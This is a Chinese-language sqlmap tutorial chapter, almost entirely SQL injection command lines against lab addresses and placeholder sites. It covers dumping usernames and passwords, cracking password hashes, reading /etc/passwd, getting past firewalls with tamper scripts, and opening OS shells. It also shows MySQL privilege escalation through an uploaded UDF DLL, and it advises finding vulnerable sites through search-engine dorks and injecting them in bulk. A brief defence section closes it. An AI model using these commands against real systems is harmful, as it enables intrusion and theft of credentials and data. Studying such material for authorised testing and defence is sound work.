sqlmap从入门到精通-第二章-2-4-sqlmap使用攻略及技巧(2)

https://www.bilibili.com/video/av840841045

2.4.4 检测和利用SQL注入

1.手工判断是否存在漏洞

针对可能存在SQL注入漏洞的URL添加+AND+1=1 和 +AND+1=2 看返回的结果是否一致，如果不一致那么就存在SQL注入

2.sqlmap自动检测

实际测试使用sqlmap的过程中会一直提示你应答，有交互的过程，可以通过参数--batch 来完成自动应答的效果

3.寻找和判断实例

可以通过百度或者谷歌使用相关语法进行搜索，这里不做具体细节演示，可以搜索Google Hack语法

4.批量检测

可以将收集到可能存在SQL注意漏洞的URL放在一个文本文件中，例如：将所有的URL地址保存 bmfx.txt ，然后使用sqlmap.py -m bmfx.txt 即可开始进行批量注入探测，注意bmfx.txt文件需要和sqlmap在同一个目录下，否则sqlmap找不到对应的文件

2.4.5 直接连接数据库

sqlmap直接连接数据库的命令如下：

sqlmap.py -d "mysql://root:root@192.168.91.130:3306/dvwa" -f --banner --dbs --users

2.4.6 数据库相关操作

1.列数据库信息：--dbs

2.目标站点当前Web所使用的数据库：--current-db

3.目标站点当前Web所使用数据库的账户：--current-user

4.列出目标站点数据库的所有用户：--users

5.列出目标站点数据库的密码：--passwords

6.指定库名列出所有表：-D database --tables

参数说明：

-D 指定数据库名称

7.指定库名表名列出所有字段：-D bmfx_com -T root --columns

参数说明：

-T 指定要列出字段的表

8.指定库名表名字段dump出指定字段：

-D bmfx_com -T admin -C id,username,password --dump

-D bmfx_com -T admin -C "id,username,password" --dump

上面可以加双引号，也可以不加双引号

9.导出多少条数据：

-D bmfx_com -T admin -C id,username,password --start 1 --stop 10 --dump

参数说明：

--start 指定开始的行

--stop 指定结束的行

上述含义就是导出id,username,password 的1-10行的数据内容

2.4.7 sqlmap使用技巧

1.MySQL的注释方法绕过WAF进行SQL注入

(1) 使用sqlmap进行注入测试：

sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper "halfversionedmorekeywords.py"

(2) 其他绕过WAF脚本的方法

sqlmap.py -u "http://192.168.91.130/dvwa/vuln.php?id=3" --tamper tamper/between.py, tamper/randomcase.py -v 3

(4) tamper目录下文件的具体含义：

space2comment 空格替换为/**/

apostrophemask 单引号替换为UTF-8字符

equaltolike 等号替换为like

space2dash 空格替换为–加随机字符 ; 绕过过滤'=' 替换空格字符(' ') , ('-') 跟一个破折号注释，一个随机字符串和一个新行('n')

greatest 大于号替换为greatest；绕过过滤'>'，用GREATEST替换大于号

space2hash 空格替换为#加随机字符；空格替换为#，随机字符串及换行符

apostrophenullencode 替换双引号为%00%27；绕过过滤双引号，替换字符和双引号

halfversionedmorekeywords 在每个关键字前加注释

space2morehash 空格替换为#加更多的随机字符及换行符

appendnullbyte 在有效载荷结束位置加载零字节字符编码例如：%00

ifnull2ifisnull 绕过对IFNULL过滤，替换类似IFNULL(A,B)为IF(ISNULL(A),B,A)

space2mssqlblank 空格替换为其他空符号 ; 替换空格

modsecurityversioned 过滤空格，包含完整的查询版本的注释

base64encode 使用base64编码替换

space2mssqlhash 空格替换为%23%0A

space2mysqldash 替换空格字符(''),('-') 后跟一个破折号注释一个新行('n')

space2mysqlblank 空格替换为其他空白符号(Mysql)

between 比较符替换为between ; 用between替换大于号(>)

multiplespaces 围绕SQL关键字添加多个空格

space2plus 空格替换为加号；用+替换空格

bluecoat 代替空格字符后与一个有效的随机空白字符的SQL语句，等号替换为like

nonrecursivereplacement 双重查询语句取代SQL关键字；替换预定义关键字

space2randomblank 代理空格字符("")，从空白字符集中选择&09,%0A,%0C,%0D 来替代空白符

sp_password 追加sp_password，从DBMS日志的自动模糊处理的有效载荷的末尾

chardoubleencode 双url编码(不处理已编码的)

unionalltounion union all select替换为union select

charencode URL编码

randomcase 字符大小写随机替换；随机大小写

unmagicquotes 宽字符绕过GPC addslashes

randomcomments 使用/**/分割SQL关键字

charunicodeencode 字符串unicode编码

securesphere 追加特制的字符串

versionedmorekeywords 使用注释绕过

2.URL重写SQL注入测试

value1 为测试参数，加"*" 即可，sqlmap将会测试value1的位置是否存在注入

sqlmap.py -u "http://targeturl/paraml/value1*/param2/value2"

3.列举并破解密码哈希值

当前用户有权限读取包含用户密码的权限时，sqlmap会先列举出用户，然后列出Hash，并尝试破解

sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --passwords -v 1

4.获取表中的数据个数

代码如下：

sqlmap.py -u "http://192.168.91.130/sqlmap/mysql/get_int.php?id=3" --count -D bmfxdb

5.对网站xxx.com进行漏洞爬取

代码如下：

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --crawl=3

6.基于布尔SQL注入预估时间

代码如下：

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --b --eta

7.使用hex避免字符编码导致数据丢失

代码如下：

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --banner --hex -v 3 --parse-errors

8.模拟测试手机环境站点

代码如下：

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --mobile

9.智能判断测试

代码如下：

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --batch --smart

10.结合burpsuite进行注入

代码如下：

通过burpsuite抓包，需要设置burpsuite记录请求日志

sqlmap.py -r burpsuite.txt

指定表单注入：

sqlmap.py -u "http://xxx.com/sqlmap/mysql/get_int.php?id=3" --data "username=root&password=root"

11.sqlmap自动填写表单注入

sqlmap.py -u URL --forms

sqlmap.py -u URL --forms --dbs

sqlmap.py -u URL --forms --current-db

sqlmap.py -u URL --forms -D 数据库名 --tables

sqlmap.py -u URL --forms -D 数据库名 -T 表名 --columns

sqlmap.py -u URL --forms -D 数据库名 -T 表名 -C username,password --dump

12.读取Linux下的文件

代码如下：

sqlmap.py -u URL --file /etc/passwd

13.延时注入

代码如下：

sqlmap.py -u URL --technique -T --current-user

14.sqlmap结合Burpsuite进行post注入

结合Burpsuite来使用sqlmap

使用Burpsuite一个POST登录的请求数据包，然后保存为bmfx.txt ，并保存在sqlmap目录下面，运行如下命令

sqlmap.py -r bmfx.txt -p tfUPass

15.sqlmap Cookies注入

代码如下：

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --dbs --level 2

默认情况下sqlmap只支持get/post参数的注入测试，但是如果使用--level 设置其参数数值大于等于2的时候，sqlmap就会去检查Cookie中的参数，当大于等于3的时候就会去检查User-Agent和Referer，可以通过Burpsuite获取Cookie值，然后开始注入：

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3--dbs

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 --current-db

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 --tables

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 --columns

sqlmap.py -u URL --cookie "PHPSession=xxxxx; id=3" --level 3 -D 数据库名 -T 表名 -C username,password --dump

16.Mysql提权

(1) 连接Mysql数据打开一个交互shell：

sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --sql-shell

select @@version;

select @@plugin_dir;

D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\

(2) 利用slqmap上传lib_mysqludf_sys到Mysql插件目录

sqlmap.py -d mysql://root:root@127.0.0.1:3306/bmfx --file-write=D:/tmp/lib_mysqludf_sys.dll --file-dest=D:\\phpstudypro\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.dll'

select sys_eval('ver');

17.执行shell命令

代码如下：

sqlmap.py -u URL --os-cmd="net user" 执行net user命令

sqlmap.py -u URL --os-shell 系统交互式shell

18.延时注入

代码如下：

sqlmap.py -u URL --delay 0.5 延时0.5秒

sqlmap.py -u URL --safe-freq 请求2次

2.4.8 安全防范

利用sqlmap进行的所有攻击都是因为存在安全漏洞，因此建议的安全防范防范如下：

(1) 对源代码进行安全代码审计，对存在安全漏洞的代码进行修补

(2) 在网站部署云安全防护，如云盾，安全狗等各种安全防护软件

(3) 定期查看网站安全日志，分析主要访问来源，对涉及可能攻击的页面进行检查